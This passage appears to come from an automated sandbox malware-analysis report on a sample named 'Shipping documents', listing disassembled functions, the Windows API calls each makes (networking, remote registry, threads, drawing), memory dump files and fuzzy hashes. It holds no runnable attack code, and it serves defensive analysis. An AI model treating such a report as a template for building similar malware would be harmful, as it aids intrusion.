                                                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                          Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1938898002-0
                                                                                                          • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                          • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                          Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3771399671-0
                                                                                                          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                          Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2737351978-0
                                                                                                          • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                          • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                          Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                                                          • __getptd.LIBCMT ref: 00415253
                                                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                          • _free.LIBCMT ref: 0041529E
                                                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3638380555-0
                                                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                          Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 3207048006-625585964
                                                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                          Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945290962-0
                                                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                          Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                          Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 780548581-3081909835
                                                                                                          • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                          • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                          Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                          • String ID:
                                                                                                          • API String ID: 4082120231-0
                                                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                          Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2027346449-0
                                                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                          Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • GetMenu.USER32 ref: 0047A703
                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257027151-0
                                                                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                          Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastselect
                                                                                                          • String ID:
                                                                                                          • API String ID: 215497628-0
